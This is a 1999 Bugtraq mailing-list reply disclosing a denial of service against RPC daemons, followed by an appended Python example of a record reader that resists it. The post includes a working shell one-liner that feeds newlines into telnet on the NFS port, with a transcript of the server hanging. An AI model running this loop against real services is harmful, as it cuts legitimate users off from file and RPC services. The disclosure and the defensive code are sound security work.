Bugtraq mailing list archives
Re: KKIS.08041999.001.b - security raport - flaws in rpc part of
From: peter () ATTIC VUURWERK NL (Peter van Dijk)
Date: Thu, 15 Apr 1999 21:46:34 +0200
On Wed, Apr 14, 1999 at 03:26:14PM +0200, Lukasz Luzar wrote:
> [ Contacts ]
> KKI Security Team                    Cracow Commercial Internet, Poland
> http://www.security.kki.pl           http://www.kki.pl
> mailto:security () security kki pl   mailto:biuro () kki pl
> [ Information ]
> Report title : Lack of RPC's implementation in libc libraries
>                and how it affects, for example, portmap.
A much easier DoS is obtained by connecting to an RPC port and just sending some random
(most will do) garbage every 5 seconds. Note that this _does_ affect the UDP services
in the same daemons. I have seen this bug in _every_ RPC implementation, with a few
exceptions: mcserv (which does not really use the RPC protocol, only the portmapper),
Sun's own nfsd [although their portmapper is buggy], and NetApp boxes.
To wit:
[root@koek] ~# ( while true ; do echo ; sleep 5 ; done ) | telnet zopie 2049
Trying 10.10.13.1...
Connected to zopie.attic.vuurwerk.nl.
Escape character is '^]'.
NFS server zopie not responding, still trying.
Connection closed by foreign host.
[root@koek] ~# NFS server zopie OK.
Right after I started the telnet, I switched to another VC and did ls /zopie, the NFS-
mounted disk. The ls did not give any output until I ctrl-C'ed the telnet.
Greetz, Peter
--
| 'He broke my heart,  | Peter van Dijk                              |
| I broke his neck'    | peter () attic vuurwerk nl                  |
| nognixz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl        |
|                      | Hardbeat@undernet - #groningen/#kinkfm/#vdh |
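The telnet transcript above points at the defence a TCP record reader needs: if the server's read timeout restarts every time a byte arrives, two bytes of garbage every few seconds hold it forever, and a daemon that serves everything from one loop then answers nothing else, UDP included. The Python reader below is an added example, not code from this post, from KKI or from any libc: it reads RPC-over-TCP record marking (RFC 5531, section 11) under one absolute deadline per record and rejects fragment lengths no real call would carry. MAX_FRAGMENT, RecordError and serve_bytes are names introduced here; serve_bytes feeds constructed peer input over a local socketpair and then lets the peer go quiet, as a stalled client would.

```python
import socket
import struct
import time

# RPC-over-TCP record marking (RFC 5531, section 11): 4-byte big-endian header per
# fragment; top bit = last fragment, low 31 bits = fragment length.
LAST_FRAGMENT = 0x80000000
MAX_FRAGMENT = 64 * 1024  # assumed local policy, not a protocol constant

class RecordError(Exception):
    pass

def _recv_exact(sock, n, deadline):
    # One absolute deadline spans the whole record, so a peer trickling a byte every
    # few seconds cannot keep extending it as it can an idle timeout reset per read.
    buf = bytearray()
    while len(buf) < n:
        sock.settimeout(max(deadline - time.monotonic(), 0.001))
        try:
            chunk = sock.recv(n - len(buf))
        except socket.timeout:
            chunk = b""
        if not chunk:
            raise RecordError("peer stalled or closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return bytes(buf)

def read_rpc_record(sock, record_timeout):
    # Assemble one complete record (all fragments) under a single deadline.
    deadline = time.monotonic() + record_timeout
    payload = bytearray()
    while True:
        (header,) = struct.unpack("!I", _recv_exact(sock, 4, deadline))
        length = header & 0x7FFFFFFF
        if length == 0 or length > MAX_FRAGMENT:
            raise RecordError("implausible fragment length %d" % length)
        payload += _recv_exact(sock, length, deadline)
        if header & LAST_FRAGMENT:
            return bytes(payload)

def serve_bytes(peer_bytes, record_timeout=0.2):
    # Demo harness: constructed peer input over a socketpair; the peer then goes quiet.
    server, client = socket.socketpair()
    try:
        client.sendall(peer_bytes)
        return ("ok", read_rpc_record(server, record_timeout))
    except RecordError as e:
        return ("error", str(e))
    finally:
        client.close()
        server.close()
```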